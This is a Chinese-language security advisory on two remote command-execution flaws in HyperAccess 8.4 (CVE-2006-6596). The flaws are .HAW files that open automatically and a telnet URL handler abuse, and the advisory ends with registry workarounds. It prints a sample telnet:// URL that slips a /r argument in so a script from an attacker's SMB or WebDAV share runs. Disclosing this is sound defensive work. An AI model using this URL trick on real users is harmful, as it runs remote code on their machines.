安全研究

安全漏洞
Hyper Access多个远程安全漏洞

发布日期:2006-12-15
更新日期:2006-12-18

受影响系统:
Hilgraeve, Inc. Hyper Access 8.4
描述:
BUGTRAQ  ID: 21594
CVE(CAN) ID: CVE-2006-6596

HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。

HyperAccess中存在两个安全漏洞:

* 通过打开.HAW文件执行命令 *

HyperAccess将会话保存为.haw文件,可通过注册表中设置的editflags未经用户交互便打开这些扩展名:

  HKEY_CLASSES_ROOT\HAWin32\EditFlags.

如果Internet Explorer用户浏览了包含有.HAW的站点,就会强制执行自动下载并由所安装的HyperAccess打开并解析文件。

* 通过Telnet URL协议执行命令 *

HyperAccess可通过将以下注册表项:  

  HKEY_CLASSES_ROOT\telnet\shell\open\command

设置为:
  
  c:\program files\hawin32\hawin32.exe /t %1

以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL:

  telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话,就会导致执行任意vbscript代码。

<*来源:Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM
  
  链接:http://secunia.com/advisories/23366/
        http://marc.theaimsgroup.com/?l=bugtraq&m=116611197513860&w=2
*>

建议:
临时解决方法:

* 在注册表中修改EditFlags,删除telnet控制程序。

厂商补丁:

Hilgraeve, Inc.
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.hilgraeve.com/index.html

浏览次数:2869
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障